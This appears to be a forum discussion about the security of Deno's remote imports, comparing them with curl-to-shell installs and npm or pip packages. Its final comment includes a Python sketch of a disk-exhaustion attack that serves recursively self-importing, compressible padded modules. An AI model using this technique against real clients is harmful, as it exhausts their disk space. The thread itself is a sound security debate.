It's not just about integrity. The URL may very well provide what it claims to provide, so checksums would match; it's the direct downloading and running of remote code that is terrifying.
This is pretty much like all the bash one-liners that pipe a curl/wget download straight into a shell. I understand there are sandbox restrictions, but are the restrictions at the dependency level, or at the program level?
If they're at the program level, they're essentially useless, since the first thing I'm going to do is break out of the sandbox to let my program do whatever it needs to do (read the fs, access the network, etc.). If they're at the dependency level, am I really expected to manage sandbox permissions for every one of my project's dependencies?
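For context, Deno's `--allow-*` flags do apply to the whole process rather than to individual dependencies. A rough sketch of what that looks like (the hostname and script name here are made-up placeholders; exact flag scoping varies by Deno version):

```shell
# Grants apply to the whole process, not per dependency:
deno run --allow-read --allow-net=api.example.com app.ts

# -A / --allow-all opens everything up -- the "break out of
# the sandbox" escape hatch described above:
deno run -A app.ts
```

Note that `--allow-net` can at least be scoped to specific hosts, which narrows the blast radius somewhat, but any dependency in the process still inherits whatever the program was granted.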
If you're afraid of "direct" downloading and executing of that code, then what do you think happens when you npm install / pip install a package?
I'd be very interested to hear if you can point to a new attack vector that didn't exist with the previous solutions.
You can generate modules on the fly on the server, each one importing the next generated module, recursively, blowing up the client's disk space. If Deno stores those files uncompressed, you can generate modules full of comments/zeros: they compress very well in transit, so they're cheap for the attacker to serve, but they eat a lot of disk space on the consumer's side.
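A minimal sketch of that attack, assuming an attacker-controlled server that synthesizes each module on request (the module-naming scheme and padding size here are hypothetical, just to show the shape of it):

```python
def generated_module(n: int, pad_bytes: int = 1_000_000) -> str:
    """Return the source of module n, which imports module n+1 and is
    padded with highly compressible filler (comment lines of zeros), so
    it transfers cheaply but occupies real disk space once the client
    caches it uncompressed."""
    # The import keeps the chain going: fetching mod0 pulls mod1, etc.
    header = f'import "./mod{n + 1}.ts";\n'
    filler = "// " + "0" * 76 + "\n"  # 80-byte line, compresses extremely well
    return header + filler * (pad_bytes // len(filler))

# Each fetched module triggers a fetch of the next, so the client's
# module cache grows without bound until the download is interrupted.
src = generated_module(0)
print(src.splitlines()[0])  # the import that continues the chain
print(len(src))             # roughly pad_bytes on disk per module
```

The attacker's server would just route `/modN.ts` to `generated_module(N)`; gzip on the wire makes each megabyte-sized module cost only a few kilobytes to serve.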